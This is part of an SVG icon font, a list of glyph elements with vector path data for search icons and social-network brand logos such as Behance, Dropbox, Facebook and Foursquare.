<glyph glyph-name="search-folder" horiz-adv-x="1000" unicode="&#xed14;" d="M906 144c-5 5-6 14-2 20 22 35 35 77 35 122 0 126-103 229-230 229s-229-103-229-229 103-230 229-230c48 0 93 15 130 41 6 4 15 3 20-2l80-80c0 0 1-1 1-1 1-1 6-6 12-11l4-5c6-5 14-5 19 0l29 29c5 5 5 14 0 19l-98 98z m-58 35c-7-10-16-19-25-27-31-26-70-42-114-42-96 0-175 79-175 176s79 175 175 175c97 0 176-79 176-175 0-41-14-78-37-107z m-410 100c0 92 46 172 116 219h-508c-38 0-40-18-38-41l34-373c2-23 8-41 46-41h496c-87 43-146 133-146 236z m332 311c-4 18-27 33-50 33h-282c-23 0-55 13-72 29l-24 24c-17 17-49 30-72 30h-135c-23 0-43-19-46-41l-12-108h702l-9 33z" />
<glyph glyph-name="search-job" horiz-adv-x="1000" unicode="&#xed15;" d="M801 146c-8 7-9 20-3 29 44 68 70 148 70 235 0 239-195 434-434 434-239 0-434-195-434-434 0-239 195-434 434-434 93 0 179 30 250 80 8 6 21 5 28-2l155-155c1-1 2-2 3-3 2-1 10-8 17-16l18-17c7-8 19-8 27 0l62 62c8 8 8 20 0 27l-193 194z m-105 62c-14-19-30-36-48-51-58-49-133-79-214-79-183 0-332 149-332 332s149 331 332 331c183 0 331-148 331-331 0-76-26-146-69-202z m-157 276c5 5 8 14 9 25 1 7 1 13-1 18-2 9-6 22-5 33 4 35-9 54-21 64-8 7-21 17-28 25-17 16-52 36-104 5-10-6-25-18-34-29-12-13-21-33-24-62-2-11-11-23-15-33-2-5-2-12-2-21 1-12 5-21 11-26 7-8 19-17 24-26 19-34 49-59 83-59 35 0 65 25 83 59 5 9 18 19 24 27z m-190 48c0 4 0 7 0 10 0 6 9 10 19 10 45 2 76 18 97 35 8 6 20 7 26-2 8-11 14-22 19-33 4-10 6-27 4-37-7-49-41-98-82-98-46 0-83 63-83 115z m62-171c0 1 1 2 1 3 1 2 2 3 2 4 0 0-1 0-1 0l-33 28c-8 7-21 10-29 9l-15-4c-49-11-84-53-84-101v-63c0-12 11-22 24-22h104c11 0 21 8 23 19l12 70c2 10-3 18-7 23-2 3-3 7-2 11l5 23z m101 44c-8 1-21-2-29-9l-33-28-1 0c0-1 1-2 2-4 0-1 1-2 1-3l5-23c1-4 0-8-2-11-4-5-9-13-7-24l12-69c2-11 12-19 23-19h104c13 0 23 10 23 22v63c0 48-34 90-84 101 0 0-6 2-14 4z" />
<glyph glyph-name="search-map" horiz-adv-x="1000" unicode="&#xed16;" d="M896 97c-6 6-7 17-2 24 22 36 35 79 35 125 0 131-106 238-238 238-131 0-237-107-237-238 0-132 106-238 237-238 50 0 95 15 133 41 8 4 18 4 24-2l81-82c1 0 1-1 2-1 1-1 7-7 13-13l2-2c6-6 16-6 22 0l28 27c6 6 6 16 0 22l-100 99z m-61 38c-7-10-16-20-26-28-32-27-73-43-118-43-100 0-181 81-181 182s81 182 181 182c101 0 182-82 182-182 0-42-14-81-38-111z m-544 45v529c0 9 7 12 14 9l222-113c8-4 14-14 14-23v-65c0-8 6-12 14-8s14 12 14 21v54c0 9 6 19 14 22l208 105c7 3 14 0 14-9v-181c0-9 6-19 13-23l1 0c8-5 13-1 13 7v239c0 9-6 13-13 9l-250-126c-8-4-20-4-28 0l-250 126c-7 4-20 4-27 0l-250-126c-8-4-14-14-14-23v-585c0-8 6-12 14-8l250 126c7 4 20 4 27 0l145-73c7-4 9-2 4 5-4 6-8 11-12 17-4 8-14 17-21 21l-102 51c-7 4-14 14-14 22z m-41-22l-208-105c-8-4-14 0-14 8v529c0 9 6 19 14 23l208 105c7 3 14 0 14-9v-529c0-8-7-18-14-22z" />
<glyph glyph-name="search-property" horiz-adv-x="1000" unicode="&#xed17;" d="M800 146c-7 8-8 20-2 29 44 68 69 148 69 235 0 239-194 434-433 434-239 0-434-195-434-434 0-239 195-434 434-434 93 0 179 30 250 80 8 6 21 6 28-2l155-155c1-1 2-2 3-3 2-1 9-8 17-15l18-19c7-7 19-7 26 0l64 64c7 7 7 19 0 26l-195 194z m-104 62c-14-19-30-36-48-51-58-49-133-79-214-79-183 0-332 149-332 332s149 332 332 332c183 0 331-149 331-332 0-76-26-146-69-202z m-510 253v-40c0-10 6-14 14-7l216 167c8 6 21 6 29 0l216-167c8-7 15-3 15 7v40c0 11-7 24-15 30l-216 168c-8 6-21 6-29 0l-216-168c-8-6-14-19-14-30z m61-70v-147c0-10 8-18 19-18h85c10 0 19 8 19 18v85c0 11 8 19 18 19h85c11 0 19-8 19-19v-85c0-10 8-18 19-18h85c10 0 19 8 19 18v147c0 10-7 23-15 29l-154 116c-9 6-22 6-30 0l-154-116c-8-6-15-19-15-29z" />
<glyph glyph-name="search-restaurant" horiz-adv-x="1000" unicode="&#xed18;" d="M800 146c-7 8-8 20-3 29 45 68 70 148 70 235 0 239-194 434-433 434-239 0-434-195-434-434 0-239 195-434 434-434 93 0 179 30 250 80 8 6 21 6 28-2l155-155c1-1 2-2 3-3 2-1 9-8 17-15l18-19c7-7 19-7 26 0l64 64c7 7 7 19 0 26l-195 194z m-104 62c-14-19-30-36-48-51-58-49-133-79-214-79-183 0-332 149-332 332 0 183 149 332 332 332 183 0 331-149 331-332 0-76-26-146-69-202z m-155 257c-3 3 1 11 8 18l69 69c7 7 11 14 9 17s-10-2-17-10l-69-69c-8-7-16-11-18-8s1 10 9 17l69 69c7 8 11 16 8 18s-10-2-17-9l-69-69c-7-7-16-11-19-8s1 11 8 18l72 67c7 7 11 15 9 17s-10-1-19-7l-76-59s-3-3-4-4c-8-8-13-17-15-27-2-10-1-27-4-37-1-5-3-9-4-13-4-10-16-11-23-4-110 105-173 130-201 135-10 1-19-1-21-2s3-9 11-16c29-30 102-103 157-158 8-7 8-19 0-26-39-39-130-131-130-131-9-8-9-22 0-31 8-8 22-8 30 0 1 1 92 92 131 131 7 7 18 8 25 1 6-6 10-10 11-11 11-11 116-115 116-115 8-9 22-9 31-1 4 5 6 10 6 16 0 9-12 21-19 28-20 20-56 57-76 77-7 7-21 16-29 22-7 4-13 10-18 17-5 9 0 24 8 31 13 10 30 18 51 18 14 0 28 5 39 14 0 0 1 1 1 1 1 1 7 8 13 16l52 66c7 8 10 16 7 19s-10-2-17-9l-66-70c-8-8-16-12-19-9z" />
<glyph glyph-name="search-stock" horiz-adv-x="1000" unicode="&#xed19;" d="M887 166c-5 5-6 14-2 20 25 39 39 84 39 134 0 138-112 250-250 250-138 0-251-112-251-250 0-139 113-251 251-251 53 0 102 17 142 45 6 4 15 4 20-2l88-87c1-1 1-2 2-2 1-1 6-6 11-11l7-7c6-5 14-5 19 0l33 33c5 5 5 14 0 19l-109 109z m-62 37c-8-11-17-21-27-30-34-28-77-45-124-45-106 0-192 86-192 192s86 191 192 191c105 0 191-86 191-191 0-44-15-85-40-117z m-637 314h-61c-8 0-13-6-13-13v-343c0-7 5-13 13-13h61c8 0 14 6 14 13v343c0 7-6 13-14 13z m141 144h-62c-7 0-13-6-13-13v-490c0-7 6-13 13-13h62c7 0 13 6 13 13v490c0 7-6 13-13 13z m275 0h-62c-7 0-13-6-13-13v-65c0-7 5-10 12-7 20 9 41 16 63 21 7 1 13 8 13 15v36c0 7-6 13-13 13z m-140-124c-16 1-45 1-61 1-8 0-13-6-13-13v-94c0-7 2-7 5-1 17 38 42 71 72 98 6 5 4 9-3 9z m-417-430v578c0 8-6 14-13 14h-21c-7 0-13-6-13-14v-625c0-7 6-13 13-13h498c7 0 8 3 1 6-15 10-29 20-43 32-5 5-15 9-23 9h-386c-7 0-13 6-13 13z" />
<glyph glyph-name="search-user" horiz-adv-x="1000" unicode="&#xed1a;" d="M905 37c-6 7-7 18-2 26 20 34 32 73 32 115 0 124-101 224-224 224s-223-100-223-224 100-223 223-223c46 0 88 14 123 37 8 5 19 5 26-2l74-75c1 0 2-1 2-1 1-1 7-7 13-13s17-6 24 0l22 23c7 6 7 17 0 24l-90 89z m-59 37c-7-9-15-18-24-26-30-25-69-40-111-40-94 0-170 76-170 170s76 171 170 171c95 0 171-76 171-171 0-39-13-75-36-104z m-469 281c124 0 224 100 224 224 0 124-100 225-224 225s-225-101-225-225 101-224 225-224z m93-43c5 8 2 11-7 8-27-11-56-16-86-16-68 0-132 27-179 77l-3 3s-4 2-6 1l-4-2c-100-58-165-159-185-285l0-2s0-3 1-4l2-2c99-120 232-186 374-186 59 0 117 12 172 34 9 4 9 11 1 16-69 50-115 132-115 224 0 49 13 94 35 134z" />
<glyph glyph-name="search" horiz-adv-x="1000" unicode="&#xed1b;" d="M991-96l-259 254c68 74 110 171 110 278 0 229-189 414-421 414-233 0-421-185-421-414 0-229 188-414 421-414 100 0 192 35 265 92l259-255c13-12 33-12 46 0 12 13 12 33 0 45z m-570 182c-197 0-356 157-356 350 0 193 159 350 356 350 196 0 356-157 356-350 0-193-160-350-356-350z" />
<glyph glyph-name="500px" horiz-adv-x="1000" unicode="&#xed1c;" d="M544 13c160 0 290 131 290 291s-130 290-291 290c-80 0-154-32-209-88v233h400c14 0 25 11 25 24s-11 24-25 24h-424c-14 0-25-9-25-22v-327l0-6c-1-12 7-22 18-25 11-3 23 2 28 12 43 78 124 126 213 126 133 0 241-108 241-241s-109-242-242-242c-44 0-87 13-124 35v207c0 68 56 124 124 124s124-56 124-124c0-69-55-124-124-124-16 0-32 3-47 9-13 6-27 0-32-13-6-12 0-27 13-32 21-9 43-13 67-13 95 0 173 77 173 173s-78 173-173 173-173-78-173-173v-168c-29 28-49 63-60 104-4 13-17 20-30 17-13-4-21-17-18-30 35-126 150-214 281-214z m-148 652c-13-6-18-20-13-33s20-18 33-12c77 34 228 70 376-75 5-5 11-7 18-7 6 0 12 2 17 7 10 10 10 25 0 35-175 172-360 116-431 85z m440-583c-11 9-26 7-35-3-65-74-159-117-257-117-174 0-319 130-339 301-1 14-14 24-27 22-14-1-23-14-22-27 23-197 189-345 388-345 113 0 220 48 294 134 9 10 8 26-2 35z m-355 162c5-5 11-7 18-7 6 0 12 2 17 7l25 25 25-25c5-5 11-8 17-8 7 0 13 3 18 7 9 10 10 25 0 35l-25 25 24 24c10 10 10 25 1 35-10 10-26 10-35 0l-25-24-24 25c-9 9-25 9-34 0-10-10-10-25-1-35l24-24-25-25c-9-10-10-25 0-35z" />
<glyph glyph-name="aim" horiz-adv-x="1000" unicode="&#xed1d;" d="M602 226c90-44 186-125 225-219-50-40-57-45-115-95-57 109-125 169-218 193-55-71-144-154-283-192-31 66-40 85-61 134 112 26 152 62 207 166-4 127 29 252 110 302 42-14 112-56 132-62-3-13 7-28 41-35 26-6 87-15 146 38 36-55 64-109 64-109s-112-111-246-76c-1-17-1-23-2-45z m16 313c-69 0-125 55-125 124-1 69 56 125 125 125s125-56 125-125c0-69-57-124-125-124z" />
<glyph glyph-name="badoo" horiz-adv-x="1000" unicode="&#xed1e;" d="M249 520c50 44 102 74 162 89 240 61 466-130 446-376-15-175-171-317-348-320-171-4-324 114-358 277-5 23-8 46-8 69-1 152-1 305-1 458 0 4 0 8 0 12 2 34 26 59 55 58 28 0 51-25 52-58 0-59 0-118 0-176l0-33z m251-508c143 0 257 114 257 255 0 129-101 253-258 254-142 1-256-115-257-254 0-141 115-255 258-255z m-131 335c42-1 72-31 72-72 0-42-32-74-73-74-42 0-73 32-73 74 0 43 31 72 74 72z" />
<glyph glyph-name="baidu-tieba" horiz-adv-x="1000" unicode="&#xed1f;" d="M397 517c52 0 95 61 95 135 0 75-43 136-95 136s-95-61-95-136 42-135 95-135z m-177-191c95 21 82 135 79 159-4 39-49 106-111 100-77-6-88-118-88-118-10-51 25-161 120-141z m403 182c70-9 115 66 124 123 9 57-36 122-86 134-50 11-112-69-117-121-7-63 9-127 79-136z m278-95c0 27-22 109-106 109-84 0-95-77-95-132 0-52 4-125 108-122 105 2 93 117 93 145z m-106-239s-109 84-172 175c-86 134-208 80-249 11-41-68-104-111-113-122-9-11-131-77-104-198 27-120 122-118 122-118s70-7 152 11c81 19 151-4 151-4s190-64 242 59c52 123-29 186-29 186z m-326-182h-123c-54 10-75 47-78 53-2 7-17 36-9 86 23 75 88 80 88 80h66v81l56-1v-299z m88 1c-55 14-57 53-57 53v157l57 1v-141c4-15 23-18 23-18h58v158h62v-210h-143z m-236 136c-3-8-9-29-4-46 11-40 46-42 46-42h49v121h-53c-24-7-35-26-38-33z" />
<glyph glyph-name="bbm-messenger" horiz-adv-x="1000" unicode="&#xed20;" d="M500 788c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m-210-497h-84l23 106h80c52 0 65-26 65-46 0-29-19-60-84-60z m28 159h-83l22 106h81c52 0 65-26 65-46 0-29-19-60-85-60z m165-325h-84l23 106h80c52 0 65-26 65-46 0-29-19-60-84-60z m31 166h-84l23 106h80c52 0 65-26 65-46 0-29-19-60-84-60z m29 159h-84l23 106h80c52 0 65-26 65-46 0-29-19-60-84-60z m164-245h-84l23 106h80c52 0 65-26 65-47 0-28-19-59-84-59z m31 150h-84l23 106h80c53 0 65-26 65-46 0-29-19-60-84-60z" />
<glyph glyph-name="bebo" horiz-adv-x="1000" unicode="&#xed21;" d="M544-88h-88c-193 0-350 158-350 351v437c0 48 39 88 88 88 48 0 87-40 87-88v-437c0-97 79-175 175-175h88c96 0 175 68 175 153 0 86-47 153-88 153h-175c-48 0-87 39-87 87 0 49 39 88 87 88h175c145 0 263-147 263-328 0-181-157-329-350-329z" />
<glyph glyph-name="behance" horiz-adv-x="1000" unicode="&#xed22;" d="M853 545h-220v55h220v-55z m-365-223c14-22 21-49 21-80 0-32-8-61-24-87-11-17-24-31-39-43-17-13-38-22-61-27-24-5-50-7-77-7h-245v544h262c67-1 114-20 141-58 17-23 25-51 25-83 0-33-8-60-25-80-9-11-23-22-41-31 27-10 49-26 63-48z m-300 86h115c24 0 43 4 58 13 15 9 22 25 22 48 0 25-10 42-29 50-17 6-38 9-64 9h-102v-120z m206-158c0 28-12 48-35 58-12 6-31 9-54 9h-117v-145h115c24 0 42 3 55 10 24 12 36 34 36 68z m540 88c3-17 4-43 3-77h-283c1-39 15-67 40-82 16-10 35-15 57-15 23 0 42 6 56 18 8 6 15 15 21 27h104c-3-23-15-47-38-71-35-38-84-57-146-57-52 0-98 16-138 48-39 32-59 84-59 156 0 68 17 120 53 156 36 36 83 54 140 54 34 0 64-6 92-18 27-12 49-32 67-58 16-23 26-50 31-81z m-102-10c-2 27-11 48-28 62-16 14-36 21-60 21-26 0-46-8-61-22-14-15-23-35-27-61h176v0z" />
<glyph glyph-name="blogger" horiz-adv-x="1000" unicode="&#xed23;" d="M658-88c153 0 277 125 278 277l1 223-2 12-7 15-13 10c-16 13-98-1-119 19-16 14-18 40-23 75-9 67-14 71-25 94-38 81-143 142-214 151h-194c-153 0-277-125-277-277v-322c0-152 124-277 277-277h318z m-315 650h154c30 0 53-24 53-53 0-29-24-53-53-53h-154c-29 0-53 24-53 53 0 29 24 53 53 53z m-53-369c0 29 24 52 53 52h313c29 0 53-23 53-52 0-29-24-53-53-53h-313c-29 0-53 24-53 53z" />
<glyph glyph-name="bootstrap" horiz-adv-x="1000" unicode="&#xed24;" d="M556 466c0 16-11 53-63 53h-79v-109h78c58 0 64 38 64 56z m-53-154h-89v-140h90c74 0 78 52 78 70 0 17-6 70-79 70z m317 476h-640c-65 0-117-53-117-118v-640c0-65 52-118 117-118h640c65 0 118 53 118 118v640c0 65-53 118-118 118z m-285-712h-262v548h255c145 0 176-103 176-143 0-82-46-103-69-113 35-10 92-40 92-144 0-30-4-148-192-148z" />
<glyph glyph-name="brightkite" horiz-adv-x="1000" unicode="&#xed25;" d="M615 405c0-9 6-50-12-81-18-31-74-13-74-13v159s10 20 52 15c43-5 34-70 34-80z m293 383v-551c0-20-13-41-38-52-56-26-779-273-779-273l161 824s13 52 82 52h574z m-211-276c-35 98-160 54-162 21l-6 2v162l-107-16v-410s63-59 165-43c103 17 118 103 118 103s28 84-8 181z" />
<glyph glyph-name="cloudapp" horiz-adv-x="1000" unicode="&#xed26;" d="M248 35l0-1h5c2 0 4 0 7 0 2 0 4 0 7 0l438 0c3 0 6 0 10 0 123 0 222 100 222 224s-99 225-222 225c-5 0-9 0-14-1-19 105-109 184-218 184-123 0-223-101-223-225 0-3 0-6 0-9h0c-109 0-197-89-197-199 0-106 82-192 185-198z" />
<glyph glyph-name="concrete5" horiz-adv-x="1000" unicode="&#xed27;" d="M855 788h-710c-45 0-82-38-82-83v-710c0-45 37-83 82-83h710c45 0 83 38 83 83v710c0 45-38 83-83 83z m-253-357s24 169 51 182c0 0 42 28 42-45 0 0-12-118-49-191 0 0-32-63-48 0 0 0 0 42 4 54z m-70 252s29-7 24-76c0 0-1-177-18-205 0 0-25-57-46 21 0 0-8 38-7 202 0 0-2 74 47 58z m-162-45s23-2 33-63c0 0 19-93 24-131 0 0 7-66-16-77 0 0-22-15-48 65 0 0-22 93-28 145 0 0-6 66 35 61z m-156-167s-13 46 20 55c0 0 24 7 36-22 0 0 40-144 44-163 0 0 6-50-15-28 0 0-16 6-53 81 0 0-24 46-32 77z m521-302s-58-65-103-105c0 0-79-82-227-35 0 0-104 24-134 129 0 0-32 124 134 182 0 0 104 26 184-3 0 0 75-26 32-75 0 0-20-31-90-15 0 0-73 19-99-4 0 0-52-37-25-96 0 0 47-65 146-27 0 0 30 16 43 35 0 0 73 77 85 85 0 0 45 39 79 30 0 0 28-7 28-27 1 0-3-20-53-74z" />
<glyph glyph-name="delicious" horiz-adv-x="1000" unicode="&#xed28;" d="M63 788v-876h875v876h-875z m437-872v434h-434v434h434v-434h434v-434h-434z" />
<glyph glyph-name="designbump" horiz-adv-x="1000" unicode="&#xed29;" d="M644 262l-33-29v311h153l-264 244-264-244h151v-77l-31 23-192-179h97v-399h175v399h108l-127 123v149h-107l190 175 189-175h-107v-383l-126-112h107v-176h175v176h97l-191 174z" />
<glyph glyph-name="designfloat" horiz-adv-x="1000" unicode="&#xed2a;" d="M562 569v85c117-26 201-107 228-233h-85c-23 78-75 126-143 148z m-126 0v85c-136-26-208-107-235-233h86c22 78 81 126 149 148z m-149-265h-86c27-146 99-213 235-240v85c-68 22-127 87-149 155z m595 55c0-215-173-389-386-389s-387 174-387 389c0 215 173 388 387 388s386-174 386-388z m-38 0c0 193-156 349-348 349s-349-156-349-349c0-193 156-350 349-350 192 1 348 157 348 350z m-348-177c-98 0-177 79-177 177 0 98 79 177 177 177 97 0 176-79 176-177 0-98-79-177-176-177z m137 177c0 76-62 138-137 138-76 0-138-62-138-138 0-76 62-138 138-138 75 0 137 62 137 138z m-71-210v-85c117 26 201 94 228 240h-85c-23-68-75-133-143-155z m333-17c-24 0-43-19-43-43s19-43 43-43 43 20 43 43-20 43-43 43z m-104-109c-30 0-55-25-55-56 0-30 25-55 55-55 30 0 55 25 55 55 0 31-25 56-55 56z m90 249c-14 0-25-11-25-25s11-25 25-25 25 11 25 25-11 25-25 25z m-758-291c-15 0-28-12-28-28 0-15 13-27 28-27s27 12 27 27c0 16-12 28-27 28z m-9 145c-14 0-26-11-26-26 0-15 12-26 26-26s27 11 27 26c-1 15-12 26-27 26z m86-66c-19 0-35-16-35-36 0-19 16-35 35-35 20 0 35 16 35 35 0 20-15 36-35 36z m695 536c-10 0-18-8-18-19 0-10 8-18 18-18 10 0 18 8 18 18 0 11-8 19-18 19z m-801 77c-18 0-31-14-31-31 0-17 13-31 31-31s31 14 31 31c-1 17-14 31-31 31z m71 115c-22 0-39-18-39-40s17-39 39-39 38 18 38 39-17 40-38 40z m-61-243c-11 0-20-8-20-19s9-20 20-20 19 9 19 20c0 11-9 19-19 19z" />
<glyph glyph-name="deviantart" horiz-adv-x="1000" unicode="&#xed2b;" d="M771 788h-159l-16-16-75-143-24-16h-268v-218h147l13-16-160-307v-160h159l16 16 75 143 24 16h268v219h-148l-12 15 160 307z" />
<glyph glyph-name="digg" horiz-adv-x="1000" unicode="&#xed2c;" d="M218 661v-155h-155v-312h243v467h-88z m-68-389v156h68v-156h-68z m175 234h88v-312h-88v312z m0 155h88v-87h-88v87z m360-155h-234v-312h146v-68h-146v-87h234v467z m-146-234v156h58v-156h-58z m399 234h-234v-312h156v-68h-156v-87h234v467z m-78-234h-68v156h68v-156z" />
<glyph glyph-name="dotcms" horiz-adv-x="1000" unicode="&#xed2d;" d="M500 582l202 206s169-24 236-230l-212-208s-21 178-226 232z m202-670s40 197 236 233l-212 205s-180-28-226-229l202-209z m-639 238l203 203s190-22 232-232l-201-209s-32 192-234 238z m204 205s35 181 230 227l-203 206s-189-33-231-234l204-199z" />
<glyph glyph-name="dribbble" horiz-adv-x="1000" unicode="&#xed2e;" d="M879 570c-39 67-92 120-159 159-67 39-141 58-220 58s-152-19-219-58-121-92-160-159c-39-68-58-141-58-220s19-153 58-220 92-120 159-159c68-39 141-59 220-59s153 20 220 59 120 92 159 159c39 67 58 141 58 220s-19 152-58 220z m-379 145c88 0 165-28 233-84-40-51-100-94-179-127-44 79-92 145-143 199 30 8 59 12 89 12z m-284-138c33 42 73 74 119 98 53-53 102-119 146-197-88-27-180-40-277-40-26 0-44 1-57 2 13 50 36 96 69 137z m-81-227c0 2 0 5 1 9 0 3 0 6 0 9 11-1 28-1 51-1 117 0 225 16 325 48 9-17 17-35 26-55-58-13-117-44-178-94-61-50-105-102-133-157-61 70-92 150-92 241z m365-365c-83 0-157 26-223 77 26 52 67 102 121 149 55 47 109 77 163 88 33-93 56-190 68-289-43-17-86-25-129-25z m310 173c-29-46-67-85-113-114-10 91-31 179-60 266 40 3 77 4 109 4 35 0 74-1 116-4-5-55-23-105-52-152z m-54 219c-51 0-98-2-141-6-11 29-21 52-30 71 90 40 155 88 192 144 53-62 82-132 86-212-35 2-71 3-107 3z" />
<glyph glyph-name="dribble" horiz-adv-x="1000" unicode="&#xed2f;" d="M500 788c-242 0-437-196-437-438s195-438 437-438c242 0 438 196 438 438s-196 438-438 438z m268-227c43-54 70-122 73-195-49 11-96 16-140 16h0c-35 0-68-3-99-9-7 19-15 36-23 53 69 30 135 74 189 135z m-268 130c81 0 154-28 213-75-45-53-104-92-168-119-45 86-88 148-118 186 24 5 48 8 73 8z m-151-35c24-28 71-90 122-186-103-31-207-38-270-38h-5c-11 0-20 0-27 1 24 98 92 179 180 223z m-190-306c0 2 0 3 0 5 10 0 22-1 37-1h0c69 1 189 6 310 45 7-15 13-30 20-45-81-28-145-71-192-114-46-41-76-82-94-110-51 60-81 136-81 220z m341-341c-76 0-146 25-203 67 12 20 38 58 79 97 43 41 101 83 178 108 26-73 49-156 67-250-38-14-78-22-121-22z m193 60c-17 85-39 161-63 230 22 3 46 5 70 5h1c41 0 86-5 134-16-17-91-69-168-142-219z" />
<glyph glyph-name="dropbox" horiz-adv-x="1000" unicode="&#xed30;" d="M772 443l-261 159 165 137 262-161-166-135z m-98-301l251 147-151 128-246-149 146-126z m-202 126l-246 149-151-128 251-147 146 126z m-234-105v-48l252-154v293l-167-137-85 46z m524 0l-85-46-166 137v-293l251 154v48h0z m-272 439l-166 137-261-161 165-135 262 159z" />
<glyph glyph-name="ebuddy" horiz-adv-x="1000" unicode="&#xed31;" d="M178 543c7 3 12 6 18 7 21 5 43 13 65 13 159 1 319 1 479 1 87-1 166-66 184-151 4-15 5-31 5-47 1-66 1-132 0-197 0-33 2-67-3-99-17-92-96-157-190-157-156-1-313-1-470 0-101 0-181 73-193 173-2 16-3 32-3 48 1 199 2 398 3 598 0 31 21 55 50 56 29 1 54-25 55-57 0-56 0-113 0-169v-19z m324-84c-77 0-153 0-230 0-56 0-95-38-95-94 0-84 1-167 0-250-1-52 34-98 98-98 151 0 301 0 452 0 60 0 98 38 98 99l-1 243c0 63-36 100-99 100l-223 0z m238-221c0-43-37-80-80-80-43 0-80 37-80 80 0 44 37 80 80 80 44 0 80-36 80-80z m-474 1c0 42 37 79 79 79 43 1 81-37 81-80-1-42-37-79-80-79-42-1-80 37-80 80z" />
<glyph glyph-name="ello" horiz-adv-x="1000" unicode="&#xed32;" d="M501 788h-2c-242-1-436-196-436-440 0-239 197-436 437-436 240 0 437 197 437 436 0 244-194 439-436 440z m246-525c-37-106-138-177-247-176-109-1-210 70-247 176-11 31-9 47 10 51 28 8 31-15 37-33 31-86 111-143 200-143 89 0 169 57 200 143 6 19 9 41 37 33 19-4 21-20 10-51z" />
<glyph glyph-name="ember" horiz-adv-x="1000" unicode="&#xed33;" d="M857 486c-13-47-63-71-63-71-115 291-264 373-264 373-7-94-119-167-119-167l-79 41c13-66-27-128-27-128-163-106-100-324-100-324l-69 32c51-373 366-328 366-328 448 3 355 572 355 572z m-367-502c-269 2-214 344-214 344 8-29 38-43 38-43 69 175 159 223 159 223 4-55 71-100 71-100l47 25c-7-40 17-77 17-77 97-63 60-194 60-194l41 19c-31-224-219-197-219-197z" />
<glyph glyph-name="envato" horiz-adv-x="1000" unicode="&#xed34;" d="M169 77l268 591c-310-126-395-325-268-591z m563 646c-203-218-378-453-502-716 13-15 28-29 45-40 110-76 302-76 425 22 136 116 179 372 186 682 1 25 1 50 1 76-3 65-102 48-155-24z" />
<glyph glyph-name="evernote" horiz-adv-x="1000" unicode="&#xed35;" d="M304 599l-142 0 177 179v-144l-35-35z m502 71c-15 26-94 56-135 56h-106s-34 61-114 61-74-35-74-66v-122l-37-39h-167s-47-31-47-98 21-302 161-324c166-26 195 51 195 61 0 39 1 98 1 98s48-93 122-93 116-42 116-86v-80s-3-50-46-50h-92s-30 23-30 56c0 32 14 41 32 41l31-2v69s-139 1-139-106 73-134 131-134h95s171 22 171 361c1 339-53 371-68 397z m-171-304s9 56 41 56c33 0 77-74 77-74s-102 18-118 18z" />
<glyph glyph-name="facebook-messenger" horiz-adv-x="1000" unicode="&#xed36;" d="M500 788c-240 0-435-182-435-406 0-127 63-241 162-315v-155l148 82c40-11 82-17 125-17 240 0 435 182 435 405s-195 406-435 406z m43-546l-110 119-217-119 238 254 114-119 213 119-238-254z" />
<glyph glyph-name="facebook" horiz-adv-x="1000" unicode="&#xed37;" d="M703 504h-138v91c0 34 22 42 38 42h98v150l-135 1c-149 0-183-112-183-184v-100h-86v-154h86v-437h182v437h122l16 154z" />
<glyph glyph-name="feedburner" horiz-adv-x="1000" unicode="&#xed38;" d="M781 213c2 13 4 26 4 39 1 164-89 228-183 283 27-144-62-233-172-202 161 264-73 264-2 455-110-79-220-298-220-457 0-43 5-82 12-118-79-31-129-76-129-126 0-96 184-174 409-174 225 0 408 78 408 174 0 49-49 94-127 126z m-438 209c-30-138 52-240 130-241 89-1 142 82 167 191 47-36 71-86 74-138l0 1c3-58-20-118-69-159-1 0-1 0-1-1-11-8-22-16-35-23l-4-2c-5-3-10-5-16-8-2 0-3-1-5-2-13-5-28-9-43-13l-7-1c-6-1-12-2-18-3l-7-1c-9 0-17-1-26-1-6 0-12 0-18 0l-5 1c-5 0-10 1-15 2l-3 0c-6 1-12 3-18 4-1 0-1 0-2 1-6 1-11 3-17 5l-1 1c-73 28-126 99-123 198-1 0-1 0-1 0 2 55 21 119 63 189z" />
<glyph glyph-name="flikr" horiz-adv-x="1000" unicode="&#xed39;" d="M451 350c0-107-87-194-194-194s-194 87-194 194 86 194 194 194 194-87 194-194z m487 0c0-107-87-194-195-194s-194 87-194 194 87 194 195 194 194-87 194-194z" />
<glyph glyph-name="folkd" horiz-adv-x="1000" unicode="&#xed3a;" d="M624 531c-6-6-20-4-31-4-4-10-4-23-9-31 19-15 58-12 75-30 37 14 8 42 31 65 35 4 43-18 53-39-8-8-29-3-44-4-8-7-11-19-18-27 8-18 30-22 35-43 46 12 93 22 142 30 13 14 10 43 31 48 34-6 45-36 48-74-18-32-65-18-79 9-46-7-90-16-133-26-3-10 3-39-4-56 29-20 40 15 66 13 15-16 16-75-18-70-18 2-21 20-22 39-13-3-16 5-26 5-20-12-31-34-53-44 3-38 46-12 66-30-2-32-25-42-57-44-2 26 6 47-22 61-30-4-43-24-71-30-1-14 5-21 9-31 7-5 36 7 44-8 0-34-46-57-71-39-2 19 12 23 18 34-9 9-13 23-18 35-27-11-52-24-88-26 0-10-8-13-5-26-1-16 22-8 22-22 8-39-55-45-66-17-1 27 32 20 22 56-22 9-60 2-79 13-12-4-12-20-22-26 2-12 15-13 13-30-29-11-72-2-66 35 16 19 46 2 57 30-17 20-36 39-44 69-67-14-120-41-181-60-6-15-7-35-18-44-19-4-20-1-40 0-17 27-8 85 27 87 19 4 12-16 26-17 63 15 118 37 181 52-13 77 100 132-26 122-13 38 11 67 35 65 40-4 9-54 40-70 28 16 48 40 84 48 3 14-3 20-4 30-3 11-28 0-31 9v31c14 13 52 11 61-5 4-19-7-24-22-26 2-13 10-19 14-30 28 11 70 8 110 9 6 5 8 15 9 26 3 16-24 3-18 21 5 46 67 20 67-13z m35-196c20 12 12 53 13 83-54 45-90-84-13-83z m-194-47c40-6 97 38 92 78-4 38-79 73-123 52-57-27-14-124 31-130z" />
<glyph glyph-name="foursquare" horiz-adv-x="1000" unicode="&#xed3b;" d="M736 787h-466c-64 0-83-48-83-78v-742c0-36 18-47 28-51s37-7 57 12c0 0 221 258 225 262s5 4 7 4h140c60 0 72 42 78 67 6 21 67 320 86 414 15 74-4 112-72 112z m-27-126l-21-101c-3-11-13-21-26-21h-182c-20 0-37-16-37-36v-22c0-21 17-38 37-38h154c15 0 27-14 24-28-3-16-19-95-21-103-1-9-11-21-25-21h-126c-26-1-32-1-47-20-16-19-154-192-154-192-1-1-2-1-2 1v586c0 14 11 25 25 25h378c13 0 26-13 23-30z" />
